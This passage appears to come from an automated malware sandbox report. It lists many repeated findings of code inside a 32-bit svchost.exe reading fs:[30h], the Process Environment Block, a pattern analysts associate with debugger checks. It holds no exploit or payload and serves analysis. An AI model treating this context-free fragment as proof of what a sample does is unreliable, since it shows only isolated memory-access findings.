Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0333A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03360124 mov eax, dword ptr fs:[00000030h]	1_2_03360124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DA118 mov ecx, dword ptr fs:[00000030h]	1_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]	1_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]	1_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DA118 mov eax, dword ptr fs:[00000030h]	1_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F0115 mov eax, dword ptr fs:[00000030h]	1_2_033F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov eax, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033DE10E mov ecx, dword ptr fs:[00000030h]	1_2_033DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C156 mov eax, dword ptr fs:[00000030h]	1_2_0332C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C8158 mov eax, dword ptr fs:[00000030h]	1_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]	1_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03336154 mov eax, dword ptr fs:[00000030h]	1_2_03336154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]	1_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]	1_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C4144 mov ecx, dword ptr fs:[00000030h]	1_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]	1_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C4144 mov eax, dword ptr fs:[00000030h]	1_2_033C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]	1_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]	1_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]	1_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B019F mov eax, dword ptr fs:[00000030h]	1_2_033B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]	1_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]	1_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A197 mov eax, dword ptr fs:[00000030h]	1_2_0332A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034061E5 mov eax, dword ptr fs:[00000030h]	1_2_034061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03370185 mov eax, dword ptr fs:[00000030h]	1_2_03370185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]	1_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EC188 mov eax, dword ptr fs:[00000030h]	1_2_033EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]	1_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D4180 mov eax, dword ptr fs:[00000030h]	1_2_033D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033601F8 mov eax, dword ptr fs:[00000030h]	1_2_033601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_033AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]	1_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F61C3 mov eax, dword ptr fs:[00000030h]	1_2_033F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C6030 mov eax, dword ptr fs:[00000030h]	1_2_033C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A020 mov eax, dword ptr fs:[00000030h]	1_2_0332A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C020 mov eax, dword ptr fs:[00000030h]	1_2_0332C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]	1_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]	1_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]	1_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E016 mov eax, dword ptr fs:[00000030h]	1_2_0334E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B4000 mov ecx, dword ptr fs:[00000030h]	1_2_033B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D2000 mov eax, dword ptr fs:[00000030h]	1_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335C073 mov eax, dword ptr fs:[00000030h]	1_2_0335C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03332050 mov eax, dword ptr fs:[00000030h]	1_2_03332050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6050 mov eax, dword ptr fs:[00000030h]	1_2_033B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F60B8 mov eax, dword ptr fs:[00000030h]	1_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_033F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C80A8 mov eax, dword ptr fs:[00000030h]	1_2_033C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333208A mov eax, dword ptr fs:[00000030h]	1_2_0333208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0332C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033720F0 mov ecx, dword ptr fs:[00000030h]	1_2_033720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0332A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033380E9 mov eax, dword ptr fs:[00000030h]	1_2_033380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B60E0 mov eax, dword ptr fs:[00000030h]	1_2_033B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B20DE mov eax, dword ptr fs:[00000030h]	1_2_033B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]	1_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336273C mov ecx, dword ptr fs:[00000030h]	1_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336273C mov eax, dword ptr fs:[00000030h]	1_2_0336273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AC730 mov eax, dword ptr fs:[00000030h]	1_2_033AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]	1_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C720 mov eax, dword ptr fs:[00000030h]	1_2_0336C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330710 mov eax, dword ptr fs:[00000030h]	1_2_03330710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03360710 mov eax, dword ptr fs:[00000030h]	1_2_03360710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C700 mov eax, dword ptr fs:[00000030h]	1_2_0336C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338770 mov eax, dword ptr fs:[00000030h]	1_2_03338770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340770 mov eax, dword ptr fs:[00000030h]	1_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03330750 mov eax, dword ptr fs:[00000030h]	1_2_03330750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BE75D mov eax, dword ptr fs:[00000030h]	1_2_033BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]	1_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372750 mov eax, dword ptr fs:[00000030h]	1_2_03372750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B4755 mov eax, dword ptr fs:[00000030h]	1_2_033B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336674D mov esi, dword ptr fs:[00000030h]	1_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]	1_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336674D mov eax, dword ptr fs:[00000030h]	1_2_0336674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033307AF mov eax, dword ptr fs:[00000030h]	1_2_033307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033E47A0 mov eax, dword ptr fs:[00000030h]	1_2_033E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033D678E mov eax, dword ptr fs:[00000030h]	1_2_033D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]	1_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033347FB mov eax, dword ptr fs:[00000030h]	1_2_033347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]	1_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]	1_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033527ED mov eax, dword ptr fs:[00000030h]	1_2_033527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_033BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B07C3 mov eax, dword ptr fs:[00000030h]	1_2_033B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334E627 mov eax, dword ptr fs:[00000030h]	1_2_0334E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03366620 mov eax, dword ptr fs:[00000030h]	1_2_03366620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03368620 mov eax, dword ptr fs:[00000030h]	1_2_03368620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0333262C mov eax, dword ptr fs:[00000030h]	1_2_0333262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372619 mov eax, dword ptr fs:[00000030h]	1_2_03372619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE609 mov eax, dword ptr fs:[00000030h]	1_2_033AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]	1_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]	1_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]	1_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]	1_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]	1_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]	1_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334260B mov eax, dword ptr fs:[00000030h]	1_2_0334260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03362674 mov eax, dword ptr fs:[00000030h]	1_2_03362674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]	1_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033F866E mov eax, dword ptr fs:[00000030h]	1_2_033F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]	1_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A660 mov eax, dword ptr fs:[00000030h]	1_2_0336A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0334C640 mov eax, dword ptr fs:[00000030h]	1_2_0334C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033666B0 mov eax, dword ptr fs:[00000030h]	1_2_033666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0336C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]	1_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03334690 mov eax, dword ptr fs:[00000030h]	1_2_03334690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_033AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]	1_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B06F1 mov eax, dword ptr fs:[00000030h]	1_2_033B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0336A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]	1_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]	1_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]	1_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]	1_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]	1_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03340535 mov eax, dword ptr fs:[00000030h]	1_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]	1_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]	1_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]	1_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]	1_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E53E mov eax, dword ptr fs:[00000030h]	1_2_0335E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033C6500 mov eax, dword ptr fs:[00000030h]	1_2_033C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]	1_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]	1_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]	1_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]	1_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]	1_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]	1_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03404500 mov eax, dword ptr fs:[00000030h]	1_2_03404500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]	1_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]	1_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336656A mov eax, dword ptr fs:[00000030h]	1_2_0336656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]	1_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03338550 mov eax, dword ptr fs:[00000030h]	1_2_03338550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]	1_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033545B1 mov eax, dword ptr fs:[00000030h]	1_2_033545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]	1_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]	1_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B05A7 mov eax, dword ptr fs:[00000030h]	1_2_033B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E59C mov eax, dword ptr fs:[00000030h]	1_2_0336E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03332582 mov eax, dword ptr fs:[00000030h]	1_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03332582 mov ecx, dword ptr fs:[00000030h]	1_2_03332582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03364588 mov eax, dword ptr fs:[00000030h]	1_2_03364588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0335E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033325E0 mov eax, dword ptr fs:[00000030h]	1_2_033325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]	1_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336C5ED mov eax, dword ptr fs:[00000030h]	1_2_0336C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033365D0 mov eax, dword ptr fs:[00000030h]	1_2_033365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0336A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]	1_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E5CF mov eax, dword ptr fs:[00000030h]	1_2_0336E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]	1_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]	1_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332E420 mov eax, dword ptr fs:[00000030h]	1_2_0332E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332C427 mov eax, dword ptr fs:[00000030h]	1_2_0332C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]	1_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]	1_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]	1_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]	1_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]	1_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]	1_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033B6420 mov eax, dword ptr fs:[00000030h]	1_2_033B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]	1_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]	1_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03368402 mov eax, dword ptr fs:[00000030h]	1_2_03368402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]	1_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]	1_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335A470 mov eax, dword ptr fs:[00000030h]	1_2_0335A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033BC460 mov ecx, dword ptr fs:[00000030h]	1_2_033BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033EA456 mov eax, dword ptr fs:[00000030h]	1_2_033EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0332645D mov eax, dword ptr fs:[00000030h]	1_2_0332645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0335245A mov eax, dword ptr fs:[00000030h]	1_2_0335245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]	1_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]	1_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]	1_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0336E443 mov eax, dword ptr fs:[00000030h]	1_2_0336E443
